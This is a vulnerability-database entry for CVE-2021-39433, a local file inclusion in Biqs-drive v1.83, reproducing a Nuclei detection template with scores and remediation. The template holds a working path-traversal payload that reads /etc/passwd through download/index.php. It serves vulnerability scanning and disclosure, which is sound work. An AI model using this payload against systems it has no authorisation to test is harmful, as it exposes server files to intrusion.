Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-39433
HistoryJan 23, 2022 - 3:15 p.m.

BIQS IT Biqs-drive v1.83 Local File Inclusion

2022-01-2315:15:30
ProjectDiscovery
github.com
3
biqs it
biqs-drive
local file inclusion
vulnerability
arbitrary files
server
permissions
sensitive information
remote code execution
system compromise
upgrade
cve-2021-39433

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.009

Percentile

83.0%

A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.

id: CVE-2021-39433

info:
  name: BIQS IT Biqs-drive v1.83 Local File Inclusion
  author: Veshraj
  severity: high
  description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Upgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability.
  reference:
    - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
    - https://biqs-drive.be/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-39433
    epss-score: 0.00688
    epss-percentile: 0.80055
    cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: biqs
    product: biqsdrive
  tags: cve2021,cve,lfi,biqsdrive,biqs

http:
  - method: GET
    path:
      - "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b8cf99898eb4e0b35c557c93898716ae32358b101a4ed8d4017383d874cfe87202206e7cf5d8562794d68f0ec7444e9b34b3aa9dbab856202e846777e8dbc7de89e7:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.009

Percentile

83.0%

Related for NUCLEI:CVE-2021-39433